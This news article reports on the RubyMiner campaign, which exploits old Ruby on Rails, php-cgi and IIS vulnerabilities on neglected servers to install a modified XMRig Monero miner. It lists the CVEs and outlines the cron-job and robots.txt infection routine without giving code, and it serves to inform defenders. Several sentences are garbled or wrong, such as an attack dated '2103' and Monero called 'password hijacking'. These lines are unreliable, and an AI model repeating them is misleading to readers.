RubyMiner malware hits vulnerable servers to mine cryptocurrencies

Security researchers recently observed RubyMiner, a new type of malware deployed online-a cryptocurrency miner found on forgotten web servers. According to findings released by Check Point and Certego and information received by researchers from Ixia, the attacks started last week, January 9-10.

Attack Linux and Windows servers

Ixia security researcher Stefan Tanase said RubyMiner targets Windows and Linux systems. The team behind the malware RubyMiner uses a web server fingerprinting tool called p0f to scan and identify Linux and Windows servers running outdated software. Once unpatched servers are identified, attackers can deploy known vulnerabilities on vulnerable servers and then use RubyMiner to infect them.

Check Point and Ixia said they have observed that attackers deployed the following vulnerabilities in the recent wave of attacks:

◍  Ruby on Rails XML Processor YAML Deserialization Code Execution (CVE-2013-0156) [1]
◍  PHP php-cgi Query String Parameter Code Execution (CVE-2012-1823; CVE-2012-2311; CVE-2012-2335; CVE-2012-2336; CVE-2013-4878) [1, 2, 3, 4]
◍  Microsoft IIS ASP Scripts Source Code Disclosure (CVE-2005-2678) [1]

Attackers hide the malicious code in the robots.txt file

In a report released last week, Check Point explores the RubyMiner infection routine on Linux systems based on data collected from honeypot servers and recognizes the attackers’ creativeness in some ways:

▨  The exploit code contains a series of shell commands
▨  Attackers clear all cron jobs
▨  Attackers add a new hourly cron job
▨  New cron job downloads a script hosted online
▨  This script is hosted inside the robots.txt file of various domains
▨  The script downloads and installs a modified version of the legitimate XMRig Monero miner application.

Lotem Finkelstein, a security researcher at Check Point, said attackers are now targeting Windows IIS servers but did not get a copy of the Windows version of RubyMiner. In addition, Check Point said that a malware activity in 2103 deployed the same Ruby on Rails vulnerability as RubyMiner, and Check Point speculated that the team behind it is likely to be trying to extend RubyMiner.

The trend of Monero mining malware has become increasingly evident

Overall, there has been an increase in attempts to spread cryptocurrencies in recent months to mine malware, especially in the search for Monero malware.

In addition to password hijacking events (also known as Monero), some of the Monero mining malware families and botnets in 2017 include Digmine, unknown botnets for WordPress, Hexmen, Loapi, Zealot, aterMiner, unknown zombies for IIS 6.0 servers Network, CodeFork and Bondnet. And just in the first two weeks of 2018, there have been PyCryptoMiner for Linux servers and another for Oracle WebLogic Server. In most incidents targeted at Web servers, the researchers found that attackers tried to exploit the most recent exploits because there were more vulnerable machines. Strangely enough, RubyMiner attackers use very old vulnerabilities and most security software can detect these vulnerabilities.

According to researcher Finkelstein, RubyMiner attackers may have deliberately looked for abandoned machines, such as forgotten PCs and servers with older operating systems, and infected devices to ensure long-term mining under safety radar.

RubyMiner gangs have infected more than 700 servers

According to the wallet addresses found in custom XMRig miners deployed by the RubyMiner malware, Check Point’s initial statistics show that there are around 700 RubyMiner-infected servers and the attackers earn about $540. Some experts believe that if the attackers began to use the recent loopholes, the team behind the scenes may earn more money. For example, a hacking group that started with Oracle WebLogic Server beginning in October 2017, had a profit of $226,000.

Source: BleepingComputer